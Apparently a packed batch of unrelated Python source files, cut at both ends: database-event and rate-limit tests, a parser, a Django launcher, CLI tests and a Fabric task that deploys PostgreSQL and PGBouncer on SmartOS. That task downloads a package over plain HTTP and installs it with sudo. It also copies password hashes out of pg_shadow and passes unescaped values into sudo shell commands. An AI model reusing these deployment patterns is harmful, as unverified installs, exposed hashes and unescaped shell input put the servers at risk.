        # listener replaces the dialect's own do_execute* implementation.
        m1 = Mock()

        m1.do_execute.return_value = retval
        m1.do_executemany.return_value = retval
        m1.do_execute_no_params.return_value = retval
        e = engines.testing_engine(options={"_initialize": False})

        event.listen(e, "do_execute", m1.do_execute)
        event.listen(e, "do_executemany", m1.do_executemany)
        event.listen(e, "do_execute_no_params", m1.do_execute_no_params)

        # The "real" dialect methods are also mocks so we can assert
        # whether they were invoked or bypassed.
        e.dialect.do_execute = m1.real_do_execute
        e.dialect.do_executemany = m1.real_do_executemany
        e.dialect.do_execute_no_params = m1.real_do_execute_no_params

        def mock_the_cursor(cursor, *arg):
            # Give the execution context (always the last argument) a
            # result proxy so execution completes without a real cursor.
            arg[-1].get_result_proxy = Mock(return_value=Mock(context=arg[-1]))
            return retval

        m1.real_do_execute.side_effect = m1.do_execute.side_effect = mock_the_cursor
        m1.real_do_executemany.side_effect = m1.do_executemany.side_effect = mock_the_cursor
        m1.real_do_execute_no_params.side_effect = m1.do_execute_no_params.side_effect = mock_the_cursor

        with e.connect() as conn:
            yield conn, m1

    def _assert(self, retval, m1, m2, mock_calls):
        # The event listener (m1) is always invoked; the dialect method
        # (m2) is invoked only when the listener returned a falsy value.
        eq_(m1.mock_calls, mock_calls)
        if retval:
            eq_(m2.mock_calls, [])
        else:
            eq_(m2.mock_calls, mock_calls)

    def _test_do_execute(self, retval):
        # Single-parameter-set execution dispatches to do_execute.
        with self._run_test(retval) as (conn, m1):
            result = conn.execute("insert into table foo", {"foo": "bar"})
        self._assert(
            retval,
            m1.do_execute, m1.real_do_execute,
            [call(
                    result.context.cursor,
                    "insert into table foo",
                    {"foo": "bar"}, result.context)]
        )

    def _test_do_executemany(self, retval):
        # A list of parameter sets dispatches to do_executemany.
        with self._run_test(retval) as (conn, m1):
            result = conn.execute("insert into table foo",
                            [{"foo": "bar"}, {"foo": "bar"}])
        self._assert(
            retval,
            m1.do_executemany, m1.real_do_executemany,
            [call(
                    result.context.cursor,
                    "insert into table foo",
                    [{"foo": "bar"}, {"foo": "bar"}], result.context)]
        )

    def _test_do_execute_no_params(self, retval):
        # The no_parameters execution option dispatches to
        # do_execute_no_params (no parameter argument in the call).
        with self._run_test(retval) as (conn, m1):
            result = conn.execution_options(no_parameters=True).\
                execute("insert into table foo")
        self._assert(
            retval,
            m1.do_execute_no_params, m1.real_do_execute_no_params,
            [call(
                    result.context.cursor,
                    "insert into table foo", result.context)]
        )

    def _test_cursor_execute(self, retval):
        # Low-level _cursor_execute with a hand-built execution context
        # goes through the same do_execute event path.
        with self._run_test(retval) as (conn, m1):
            dialect = conn.dialect

            stmt = "insert into table foo"
            params = {"foo": "bar"}
            ctx = dialect.execution_ctx_cls._init_statement(
                            dialect, conn, conn.connection, stmt, [params])

            conn._cursor_execute(ctx.cursor, stmt, params, ctx)

        self._assert(
            retval,
            m1.do_execute, m1.real_do_execute,
            [call(
                    ctx.cursor,
                    "insert into table foo",
                    {"foo": "bar"}, ctx)]
        )

    def test_do_execute_w_replace(self):
        self._test_do_execute(True)

    def test_do_execute_wo_replace(self):
        self._test_do_execute(False)

    def test_do_executemany_w_replace(self):
        self._test_do_executemany(True)

    def test_do_executemany_wo_replace(self):
        self._test_do_executemany(False)

    def test_do_execute_no_params_w_replace(self):
        self._test_do_execute_no_params(True)

    def test_do_execute_no_params_wo_replace(self):
        self._test_do_execute_no_params(False)

    def test_cursor_execute_w_replace(self):
        self._test_cursor_execute(True)

    def test_cursor_execute_wo_replace(self):
        self._test_cursor_execute(False)


"""
``editquality generate_make -h``
::

    Code-generate Makefile from template and configuration

    :Usage:
        generate_make -h | --help
        generate_make
                     [--config=<path>]
                     [--main=<filename>]
                     [--output=<path>]
                     [--templates=<path>]
                     [--debug]

    :Options:
        --config=<path>         Directory to search for configuration files
                                [default: config/]
        --main=<filename>       Override to use a main template other than the
                                default [default: Makefile.j2]
        --output=<path>         Where to write the Makefile output.
                                [default: <stdout>]
        --templates=<path>      Directory to search for input templates.
                                [default: templates/]
        --debug                 Print debug logging

"""

# TODO:
# * make API calls to learn things
# * ores/config has dict merge
# * survey dependency solvers
# https://github.com/ninja-build/ninja/wiki/List-of-generators-producing-ninja-build-files
# ** Still considering: scons, doit, drake, ninja, meson
# ** Don't like so far: waf
# * Where can we store information about samples?
#   Original population rates; how we've distorted them.

import logging
import os.path
import sys

import docopt

from .. import config
from ..codegen import generate

logger = logging.getLogger(__name__)


def main(argv=None):
    """Entry point for ``generate_make``.

    Parses the command line with docopt (the module docstring is the
    usage specification), configures logging, renders the main Makefile
    template, and writes the result to stdout or the requested file.

    :param argv: argument list to parse instead of ``sys.argv[1:]``
        (useful for testing); ``None`` means use the real command line.
    """
    args = docopt.docopt(__doc__, argv=argv)

    logging.basicConfig(
        level=logging.DEBUG if args['--debug'] else logging.WARNING,
        format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
    )

    config_path = args["--config"]

    # "<stdout>" is the documented sentinel default for --output.
    output_f = sys.stdout \
        if args["--output"] == "<stdout>" \
        else open(args["--output"], "w")

    try:
        templates_path = args["--templates"]
        main_template_path = args["--main"]
        if not os.path.isabs(main_template_path):
            # Join a filename to the default templates dir.
            main_template_path = os.path.join(templates_path, main_template_path)
        with open(main_template_path, "r") as f:
            main_template = f.read()

        variables = config.load_config(config_path)

        output = generate.generate(variables, templates_path, main_template)
        output_f.write(output)
    finally:
        # Close the output handle we opened (previously leaked); never
        # close the shared sys.stdout.
        if output_f is not sys.stdout:
            output_f.close()

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------

from msrest.serialization import Model


class Product(Model):
    """Two-field model generated by AutoRest for msrest serialization."""

    # Attribute names required when deserializing (none for this model).
    _required = []

    # Maps Python attribute names to wire-format keys and msrest types.
    _attribute_map = {
        'integer': {'key': 'integer', 'type': 'int'},
        'string': {'key': 'string', 'type': 'str'},
    }

    def __init__(self, *args, **kwargs):
        """Product

        :param int integer: integer value carried by the model
        :param str string: string value carried by the model
        """
        self.integer = None
        self.string = None

        super(Product, self).__init__(*args, **kwargs)

# coding=utf8
"""
Parser for todo format string.

  from todo.parser import parser
  parser.parse(string)  # returns a Todo instance

"""

from models import Task
from models import Todo

from ply import lex
from ply import yacc


class TodoLexer(object):
    """
    Lexer for Todo format string.
    Tokens
      ID        e.g. '1.'
      DONE      e.g. '(x)'
      TASK      e.g. 'This is a task'
    """

    tokens = (
        "ID",
        "DONE",
        "TASK",
    )

    t_ignore = "\x20\x09"  # ignore spaces and tabs

    # NOTE: in ply, each t_* method's docstring IS the token's regular
    # expression and must be preserved verbatim.
    def t_ID(self, t):
        r'\d+\.([uU]|[lL]|[uU][lL]|[lL][uU])?'
        # Drop the trailing character and parse the number.
        # NOTE(review): [:-1] removes only the final character, so an ID
        # carrying one of the optional suffixes (e.g. '1.u') would leave
        # the '.' in place and make int() raise — confirm the suffix
        # alternatives in the regex are intentional.
        t.value = int(t.value[:-1])
        return t

    def t_DONE(self, t):
        r'(\(x\))'
        return t

    def t_TASK(self, t):
        r'((?!\(x\))).+'
        return t

    def t_newline(self, t):
        r'\n+'
        # Track line numbers so error messages can report them.
        t.lexer.lineno += len(t.value)

    def t_error(self, t):
        raise SyntaxError(
            "Illegal character: '%s' at Line %d" % (t.value[0], t.lineno)
        )

    def __init__(self):
        self.lexer = lex.lex(module=self)


class TodoParser(object):
    """
    Parser for Todo format string, works with a todo lexer.

    Parse string to Python list
      todo_str = "1. (x) Write email to tom"
      TodoParser().parse(todo_str)
    """

    tokens = TodoLexer.tokens

    # NOTE: in ply, each p_* method's docstring is a grammar rule and
    # must be preserved verbatim.
    def p_error(self, p):
        # ``p`` is None when the error occurs at end of input.
        if p:
            raise SyntaxError(
                "Character '%s' at line %d" % (p.value[0], p.lineno)
            )
        else:
            raise SyntaxError("SyntaxError at EOF")

    def p_start(self, p):
        "start : translation_unit"
        p[0] = self.todo

    def p_translation_unit(self, p):
        """
        translation_unit : translate_task
                         | translation_unit translate_task
                         |
        """
        # Tasks accumulate on self.todo as a side effect of
        # p_translation_task; nothing to build here.
        pass

    def p_translation_task(self, p):
        """
        translate_task : ID DONE TASK
                       | ID TASK
        """
        # Four symbols -> ID DONE TASK (completed task);
        # three symbols -> ID TASK (pending task).
        if len(p) == 4:
            done = True
            content = p[3]
        elif len(p) == 3:
            done = False
            content = p[2]
        task = Task(p[1], content, done)
        self.todo.append(task)

    def __init__(self):
        self.parser = yacc.yacc(module=self, debug=0, write_tables=0)

    def parse(self, data):
        # reset list
        self.todo = Todo()
        return self.parser.parse(data)


# Module-level singletons, e.g. ``from todo.parser import parser``.
lexer = TodoLexer()  # build lexer
parser = TodoParser()  # build parser

import time

import pymemcache.client
import pytest

from limits import RateLimitItemPerMinute, RateLimitItemPerSecond
from limits.storage import MemcachedStorage, storage_from_string
from limits.strategies import (
    FixedWindowElasticExpiryRateLimiter,
    FixedWindowRateLimiter,
)
from tests.utils import fixed_start


@pytest.mark.memcached
@pytest.mark.flaky
class TestMemcachedStorage:
    """Integration tests for MemcachedStorage against live memcached
    servers (single node on :22122, cluster on :22122 + :22123)."""

    @pytest.fixture(autouse=True)
    def setup(self, memcached, memcached_cluster):
        # Depending on the memcached fixtures ensures the servers are up.
        self.storage_url = "memcached://localhost:22122"

    def test_init_options(self, mocker):
        # Extra kwargs must be forwarded to pymemcache's PooledClient.
        constructor = mocker.spy(pymemcache.client, "PooledClient")
        assert storage_from_string(self.storage_url, connect_timeout=1).check()
        assert constructor.call_args[1]["connect_timeout"] == 1

    @fixed_start
    def test_fixed_window(self):
        storage = MemcachedStorage("memcached://localhost:22122")
        limiter = FixedWindowRateLimiter(storage)
        # NOTE(review): despite the name, ``per_min`` is a per-SECOND
        # limit of 10 hits.
        per_min = RateLimitItemPerSecond(10)
        start = time.time()
        count = 0

        # The first 10 hits inside the window succeed; the 11th fails.
        while time.time() - start < 0.5 and count < 10:
            assert limiter.hit(per_min)
            count += 1
        assert not limiter.hit(per_min)

        # Once the one-second window has elapsed the limit resets.
        while time.time() - start <= 1:
            time.sleep(0.1)
        assert limiter.hit(per_min)

    @fixed_start
    def test_fixed_window_cluster(self):
        # Same scenario as test_fixed_window, against the two-node cluster.
        storage = MemcachedStorage("memcached://localhost:22122,localhost:22123")
        limiter = FixedWindowRateLimiter(storage)
        per_min = RateLimitItemPerSecond(10)
        start = time.time()
        count = 0

        while time.time() - start < 0.5 and count < 10:
            assert limiter.hit(per_min)
            count += 1
        assert not limiter.hit(per_min)

        while time.time() - start <= 1:
            time.sleep(0.1)
        assert limiter.hit(per_min)

    @fixed_start
    def test_fixed_window_with_elastic_expiry(self):
        storage = MemcachedStorage("memcached://localhost:22122")
        limiter = FixedWindowElasticExpiryRateLimiter(storage)
        # 2 hits per 2-second window; each hit extends the expiry.
        per_sec = RateLimitItemPerSecond(2, 2)

        assert limiter.hit(per_sec)
        time.sleep(1)
        assert limiter.hit(per_sec)
        # Window was extended by the second hit, so it is still full...
        assert not limiter.test(per_sec)
        time.sleep(1)
        assert not limiter.test(per_sec)
        time.sleep(1)
        # ...until the extended window finally expires.
        assert limiter.test(per_sec)

    @fixed_start
    def test_fixed_window_with_elastic_expiry_cluster(self):
        # Same elastic-expiry scenario against the two-node cluster.
        storage = MemcachedStorage("memcached://localhost:22122,localhost:22123")
        limiter = FixedWindowElasticExpiryRateLimiter(storage)
        per_sec = RateLimitItemPerSecond(2, 2)

        assert limiter.hit(per_sec)
        time.sleep(1)
        assert limiter.hit(per_sec)
        assert not limiter.test(per_sec)
        time.sleep(1)
        assert not limiter.test(per_sec)
        time.sleep(1)
        assert limiter.test(per_sec)

    def test_clear(self):
        # clear() resets an exhausted limit immediately.
        storage = MemcachedStorage("memcached://localhost:22122")
        limiter = FixedWindowRateLimiter(storage)
        per_min = RateLimitItemPerMinute(1)
        limiter.hit(per_min)
        assert not limiter.hit(per_min)
        limiter.clear(per_min)
        assert limiter.hit(per_min)

import os
import sys
import tempfile

from fabric.api import run, sudo, env, local, hide, settings
from fabric.contrib.files import append, sed, exists, contains
from fabric.context_managers import prefix
from fabric.operations import get, put
from fabric.context_managers import cd

from fabric.tasks import Task

from fab_deploy.functions import random_password
from fab_deploy.base import postgres as base_postgres

class JoyentMixin(object):
    """Overrides for Joyent/SmartOS hosts: packages come from pkg_add
    and the postgresql service is managed through svcadm."""

    # SmartOS data directories are not suffixed with the version.
    version_directory_join = ''

    def _get_data_dir(self, db_version):
        # Try to get from svc first
        output = run('svcprop -p config/data postgresql')
        if output.stdout and exists(output.stdout, use_sudo=True):
            return output.stdout
        # Fall back to the base class's conventional location.
        return base_postgres.PostgresInstall._get_data_dir(self, db_version)

    def _install_package(self, db_version):
        sudo("pkg_add postgresql%s-server" %db_version)
        sudo("pkg_add postgresql%s-replicationtools" %db_version)
        sudo("svcadm enable postgresql")

    def _restart_db_server(self, db_version):
        sudo('svcadm restart postgresql')

    def _stop_db_server(self, db_version):
        sudo('svcadm disable postgresql')

    def _start_db_server(self, db_version):
        sudo('svcadm enable postgresql')

class PostgresInstall(JoyentMixin, base_postgres.PostgresInstall):
    """
    Install postgresql on server

    install postgresql package;
    enable postgres access from localhost without password;
    enable all other user access from other machines with password;
    setup a few parameters related with streaming replication;
    database server listen to all machines '*';
    create a user for database with password.
    """

    # fabric task name.
    name = 'master_setup'
    # postgres version passed to the JoyentMixin package helpers.
    db_version = '9.1'

class SlaveSetup(JoyentMixin, base_postgres.SlaveSetup):
    """
    Set up master-slave streaming replication: slave node
    """

    # fabric task name.
    name = 'slave_setup'

class PGBouncerInstall(Task):
    """
    Set up PGBouncer on a database server
    """

    name = 'setup_pgbouncer'

    pgbouncer_src = 'http://pkgsrc.smartos.org/packages/SmartOS/2012Q2/databases/pgbouncer-1.4.2.tgz'
    pkg_name = 'pgbouncer-1.4.2.tgz'
    config_dir = '/etc/opt/pkg'

    # Values written into pgbouncer.ini by _setup_parameter.
    config = {
        '*':              'host=127.0.0.1',
        'logfile':        '/var/log/pgbouncer/pgbouncer.log',
        'listen_addr':    '*',
        'listen_port':    '6432',
        'unix_socket_dir': '/tmp',
        'auth_type':      'md5',
        'auth_file':      '%s/pgbouncer.userlist' %config_dir,
        'pool_mode':      'session',
        'admin_users':    'postgres',
        'stats_users':    'postgres',
        }

    def install_package(self):
        # pgbouncer needs libevent; the tarball comes from the SmartOS
        # pkgsrc mirror and is installed with pkg_add.
        sudo('pkg_add libevent')
        with cd('/tmp'):
            run('wget %s' %self.pgbouncer_src)
            sudo('pkg_add %s' %self.pkg_name)

    def _setup_parameter(self, file_name, **kwargs):
        # Rewrite each "key = ..." line of the config file in place.
        for key, value in kwargs.items():
            origin = "%s =" %key
            new = "%s = %s" %(key, value)
            sudo('sed -i "/%s/ c\%s" %s' %(origin, new, file_name))

    def _get_passwd(self, username):
        # Read the password hash for ``username`` from pg_shadow and
        # upload it as the pgbouncer userlist file.
        with hide('output'):
            string = run('echo "select usename, passwd from pg_shadow where '
                         'usename=\'%s\' order by 1" | sudo su postgres -c '
                         '"psql"' %username)

        user, passwd = string.split('\n')[2].split('|')
        user = user.strip()
        passwd = passwd.strip()

        # mkstemp returns an open OS-level descriptor; wrap it with
        # fdopen so it is always closed (previously the fd leaked).
        fd, tmp_name = tempfile.mkstemp()
        with os.fdopen(fd, 'w') as fn:
            fn.write('"%s" "%s" ""\n' %(user, passwd))
        put(tmp_name, '%s/pgbouncer.userlist'%self.config_dir, use_sudo=True)
        local('rm %s' %tmp_name)

    def _get_username(self, section=None):
        # Look up the first configured database username for ``section``.
        try:
            names = env.config_object.get_list(section, env.config_object.USERNAME)
            username = names[0]
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt /
            # SystemExit are not swallowed; the error is still re-raised
            # after printing a hint.
            print ('You must first set up a database server on this machine, '
                   'and create a database user')
            raise
        return username

    def run(self, section=None):
        """
        Install, configure and start pgbouncer on a SmartOS host.

        :param section: config section to read the database username
            from; defaults to 'db-server'.
        """

        # pkgsrc install scripts expect nawk/nbsed under /opt/pkg/bin.
        sudo('mkdir -p /opt/pkg/bin')
        sudo("ln -sf /opt/local/bin/awk /opt/pkg/bin/nawk")
        sudo("ln -sf /opt/local/bin/sed /opt/pkg/bin/nbsed")

        self.install_package()

        svc_method = os.path.join(env.configs_dir, 'pgbouncer.xml')
        put(svc_method, self.config_dir, use_sudo=True)

        home = run('bash -c "echo ~postgres"')
        bounce_home = os.path.join(home, 'pgbouncer')

        pidfile = os.path.join(bounce_home, 'pgbouncer.pid')
        self._setup_parameter('%s/pgbouncer.ini' %self.config_dir,
                              pidfile=pidfile, **self.config)

        if not section:
            section = 'db-server'
        username = self._get_username(section)
        self._get_passwd(username)
        # postgres should be the owner of these config files
        sudo('chown -R postgres:postgres %s' %self.config_dir)

        sudo('mkdir -p %s' % bounce_home)
        sudo('chown postgres:postgres %s' % bounce_home)

        sudo('mkdir -p /var/log/pgbouncer')
        sudo('chown postgres:postgres /var/log/pgbouncer')

        # set up log
        sudo('logadm -C 3 -p1d -c -w /var/log/pgbouncer/pgbouncer.log -z 1')
        run('svccfg import %s/pgbouncer.xml' %self.config_dir)

        # start pgbouncer
        sudo('svcadm enable pgbouncer')

# Task instances fabric discovers under the names 'master_setup',
# 'slave_setup' and 'setup_pgbouncer'.
setup = PostgresInstall()
slave_setup = SlaveSetup()
setup_pgbouncer = PGBouncerInstall()

"""
Gauged
https://github.com/chriso/gauged (MIT Licensed)
Copyright 2014 (c) Chris O'Hara <cohara87@gmail.com>
"""

from urlparse import urlparse, parse_qsl
from urllib import unquote
from .mysql import MySQLDriver
from .sqlite import SQLiteDriver
from .postgresql import PostgreSQLDriver


def parse_dsn(dsn_string):
    """Parse a connection string and return the associated driver.

    Returns a ``(driver_class, args, kwargs)`` triple suitable for
    ``driver_class(*args, **kwargs)``.
    """
    dsn = urlparse(dsn_string)
    # A scheme like "mysql+foo" selects on the part before the '+'.
    scheme = dsn.scheme.split('+')[0]
    username = password = port = None
    host = dsn.netloc
    # Split optional "user[:password]@" credentials off the netloc.
    if '@' in host:
        credentials, host = host.split('@')
        if ':' in credentials:
            credentials, password = credentials.split(':')
            password = unquote(password)
        username = unquote(credentials)
    # Split an optional ":port" suffix off the host.
    if ':' in host:
        host, port = host.split(':')
        port = int(port)
    # The database name is the path (sans leading '/' and query part).
    database = dsn.path.split('?')[0][1:]
    # Some DSNs carry the query string inside the path.
    query = dsn.path.split('?')[1] if '?' in dsn.path else dsn.query
    kwargs = dict(parse_qsl(query, True))
    if scheme == 'sqlite':
        # SQLite only needs the file path.
        return SQLiteDriver, [dsn.path], {}
    if scheme == 'mysql':
        kwargs['user'] = username or 'root'
        kwargs['db'] = database
        if port:
            kwargs['port'] = port
        if host:
            kwargs['host'] = host
        if password:
            kwargs['passwd'] = password
        return MySQLDriver, [], kwargs
    if scheme == 'postgresql':
        kwargs['user'] = username or 'postgres'
        kwargs['database'] = database
        if port:
            kwargs['port'] = port
        # A unix_socket query arg overrides any host in the netloc.
        if 'unix_socket' in kwargs:
            kwargs['host'] = kwargs.pop('unix_socket')
        elif host:
            kwargs['host'] = host
        if password:
            kwargs['password'] = password
        return PostgreSQLDriver, [], kwargs
    raise ValueError('Unknown driver %s' % dsn_string)


def get_driver(dsn_string):
    """Instantiate and return the driver described by ``dsn_string``."""
    driver_cls, positional, keyword = parse_dsn(dsn_string)
    return driver_cls(*positional, **keyword)

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    # Point Django at this project's settings before running commands.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ibtokin.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)

import boto
import mock
import moto
import tempfile
import unittest

from click.testing import CliRunner

from rubberjackcli.click import rubberjack


class CLITests(unittest.TestCase):
    """CLI tests for rubberjack, with boto's S3/Beanstalk layers mocked
    out via moto and mock.patch.

    Uses ``assertEqual`` throughout: ``assertEquals`` is a deprecated
    alias and the class previously mixed the two.
    """

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.create_application_version')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_deploy(self, cav, ue):
        s3 = boto.connect_s3()
        s3.create_bucket("laterpay-rubberjack-ebdeploy")  # FIXME Remove hardcoded bucket name

        with tempfile.NamedTemporaryFile() as tmp:
            result = CliRunner().invoke(rubberjack, ['deploy', tmp.name], catch_exceptions=False)

            self.assertEqual(result.exit_code, 0, result.output)

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.describe_environments')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_promote(self, ue, de):
        # Different live/dev versions: promotion should proceed.
        de.return_value = {
            'DescribeEnvironmentsResponse': {
                'DescribeEnvironmentsResult': {
                    'Environments': [
                        {
                            'EnvironmentName': 'laterpay-devnull-live',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'old',
                        },
                        {
                            'EnvironmentName': 'laterpay-devnull-dev',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'new',
                        },
                    ],
                },
            },
        }

        CliRunner().invoke(rubberjack, ['promote'], catch_exceptions=False)

    @moto.mock_s3_deprecated
    @mock.patch('sys.exit')
    @mock.patch('boto.beanstalk.layer1.Layer1.describe_environments')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_promoting_same_version(self, ue, de, se):
        # Identical live/dev versions: promoting should abort via sys.exit.
        de.return_value = {
            'DescribeEnvironmentsResponse': {
                'DescribeEnvironmentsResult': {
                    'Environments': [
                        {
                            'EnvironmentName': 'laterpay-devnull-live',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'same',
                        },
                        {
                            'EnvironmentName': 'laterpay-devnull-dev',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'same',
                        },
                    ],
                },
            },
        }

        CliRunner().invoke(rubberjack, ['promote'], catch_exceptions=False)

        self.assertTrue(se.called)

    @moto.mock_s3_deprecated
    def test_sigv4(self):
        # Merely exercises the --sigv4-host option parsing.
        CliRunner().invoke(rubberjack, ['--sigv4-host', 'foo', 'deploy'], catch_exceptions=False)

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.create_application_version')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_deploy_to_custom_environment(self, ue, cav):
        s3 = boto.connect_s3()
        s3.create_bucket("laterpay-rubberjack-ebdeploy")  # FIXME Remove hardcoded bucket name

        with tempfile.NamedTemporaryFile() as tmp:
            result = CliRunner().invoke(rubberjack, ['deploy', '--environment', 'wibble', tmp.name], catch_exceptions=False)

            self.assertEqual(result.exit_code, 0, result.output)

        self.assertEqual(cav.call_count, 1, "create_application_version wasn't called, but it should")
        self.assertEqual(ue.call_count, 1, "update_environment wasn't called, but it should")

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.create_application_version')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_deploy_without_updating_the_environment(self, ue, cav):
        s3 = boto.connect_s3()
        s3.create_bucket("laterpay-rubberjack-ebdeploy")  # FIXME Remove hardcoded bucket name

        with tempfile.NamedTemporaryFile() as tmp:
            result = CliRunner().invoke(rubberjack, ['deploy', '--no-update-environment', tmp.name], catch_exceptions=False)

            self.assertEqual(result.exit_code, 0, result.output)

        self.assertEqual(cav.call_count, 1, "create_application_version wasn't called, but it should")
        self.assertEqual(ue.call_count, 0, "update_environment was called, but it shouldn't")

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.create_application_version')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_deploy_to_custom_bucket(self, ue, cav):
        bucket_name = 'rbbrjck-test'
        s3 = boto.connect_s3()
        s3.create_bucket(bucket_name)

        with tempfile.NamedTemporaryFile() as tmp:
            result = CliRunner().invoke(rubberjack, ['--bucket', bucket_name, 'deploy', tmp.name], catch_exceptions=False)

            self.assertEqual(result.exit_code, 0, result.output)

        self.assertEqual(cav.call_count, 1, "create_application_version wasn't called, but it should")
        self.assertEqual(ue.call_count, 1, "update_environment wasn't called, but it should")

        # The custom bucket must be passed through to Beanstalk.
        _, cav_kwargs = cav.call_args
        self.assertEqual(bucket_name, cav_kwargs['s3_bucket'])

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    @mock.patch('boto.beanstalk.layer1.Layer1.describe_environments')
    def test_promote_to_custom_environment(self, de, ue):
        CUSTOM_TO_ENVIRONMENT = "loremipsum"

        de.return_value = {
            'DescribeEnvironmentsResponse': {
                'DescribeEnvironmentsResult': {
                    'Environments': [
                        {
                            'EnvironmentName': CUSTOM_TO_ENVIRONMENT,
                            'VersionLabel': 'old',
                        },
                        {
                            'EnvironmentName': 'laterpay-devnull-dev',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'new',
                        },
                    ],
                },
            },
        }

        result = CliRunner().invoke(rubberjack, ['promote', '--to-environment', CUSTOM_TO_ENVIRONMENT], catch_exceptions=False)
        self.assertEqual(result.exit_code, 0, result.output)

from __future__ import absolute_import, division, print_function
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
from __future__ import with_statement
import pickle
import os
import sys
from io import UnsupportedOperation

import _pytest._code
import py
import pytest
import contextlib

from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.main import EXIT_NOTESTSCOLLECTED


# Mark tests that need ``os.dup`` (FD-level capture); they are expected
# to fail on platforms where it is unavailable.
needsosdup = pytest.mark.xfail("not hasattr(os, 'dup')")

if sys.version_info >= (3, 0):
    def tobytes(obj):
        """Return *obj* as bytes, encoding str input as UTF-8."""
        if isinstance(obj, str):
            obj = obj.encode('UTF-8')
        assert isinstance(obj, bytes)
        return obj

    def totext(obj):
        """Return *obj* as str, decoding bytes input as UTF-8."""
        if isinstance(obj, bytes):
            obj = str(obj, 'UTF-8')
        assert isinstance(obj, str)
        return obj
else:
    def tobytes(obj):
        """Return *obj* as a byte string, encoding unicode as UTF-8."""
        if isinstance(obj, unicode):
            obj = obj.encode('UTF-8')
        assert isinstance(obj, str)
        return obj

    def totext(obj):
        """Return *obj* as unicode, decoding byte strings as UTF-8."""
        if isinstance(obj, str):
            obj = unicode(obj, 'UTF-8')
        assert isinstance(obj, unicode)
        return obj


def oswritebytes(fd, obj):
    """Encode *obj* with :func:`tobytes` and write it to descriptor *fd*."""
    payload = tobytes(obj)
    os.write(fd, payload)


def StdCaptureFD(out=True, err=True, in_=True):
    """Build a MultiCapture using the file-descriptor capture backend."""
    multi = capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
    return multi


def StdCapture(out=True, err=True, in_=True):
    """Build a MultiCapture using the sys.std* replacement backend."""
    multi = capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
    return multi


class TestCaptureManager(object):
    def test_getmethod_default_no_fd(self, monkeypatch):
        # The default capture method is "fd" when os.dup exists and
        # "sys" otherwise.
        from _pytest.capture import pytest_addoption
        from _pytest.config import Parser
        parser = Parser()
        pytest_addoption(parser)
        default = parser._groups[0].options[0].default
        assert default == "fd" if hasattr(os, "dup") else "sys"
        parser = Parser()
        monkeypatch.delattr(os, 'dup', raising=False)
        pytest_addoption(parser)
        assert parser._groups[0].options[0].default == "sys"

    @needsosdup
    @pytest.mark.parametrize("method",
                             ['no', 'sys', pytest.mark.skipif('not hasattr(os, "dup")', 'fd')])
    def test_capturing_basic_api(self, method):
        # An outer FD capture keeps this test's own output isolated.
        capouter = StdCaptureFD()
        old = sys.stdout, sys.stderr, sys.stdin
        try:
            capman = CaptureManager(method)
            capman.start_global_capturing()
            # Suspending twice in a row is harmless and yields empty output.
            outerr = capman.suspend_global_capture()
            assert outerr == ("", "")
            outerr = capman.suspend_global_capture()
            assert outerr == ("", "")
            print("hello")
            out, err = capman.suspend_global_capture()
            if method == "no":
                # "no" leaves the standard streams untouched.
                assert old == (sys.stdout, sys.stderr, sys.stdin)
            else:
                # Output while suspended is not captured.
                assert not out
            capman.resume_global_capture()
            print("hello")
            out, err = capman.suspend_global_capture()
            if method != "no":
                assert out == "hello\n"
            capman.stop_global_capturing()
        finally:
            capouter.stop_capturing()

    @needsosdup
    def test_init_capturing(self):
        capouter = StdCaptureFD()
        try:
            capman = CaptureManager("fd")
            capman.start_global_capturing()
            # Starting twice is a programming error.
            pytest.raises(AssertionError, "capman.start_global_capturing()")
            capman.stop_global_capturing()
        finally:
            capouter.stop_capturing()


@pytest.mark.parametrize("method", ['fd', 'sys'])
def test_capturing_unicode(testdir, method):
    # Printing non-ascii text must not break either capture method.
    if hasattr(sys, "pypy_version_info") and sys.pypy_version_info < (2, 2):
        pytest.xfail("does not work on pypy < 2.2")
    if sys.version_info >= (3, 0):
        obj = "'b\u00f6y'"
    else:
        obj = "u'\u00f6y'"
    testdir.makepyfile("""
        # coding=utf8
        # taken from issue 227 from nosetests
        def test_unicode():
            import sys
            print (sys.stdout)
            print (%s)
    """ % obj)
    result = testdir.runpytest("--capture=%s" % method)
    result.stdout.fnmatch_lines([
        "*1 passed*"
    ])


@pytest.mark.parametrize("method", ['fd', 'sys'])
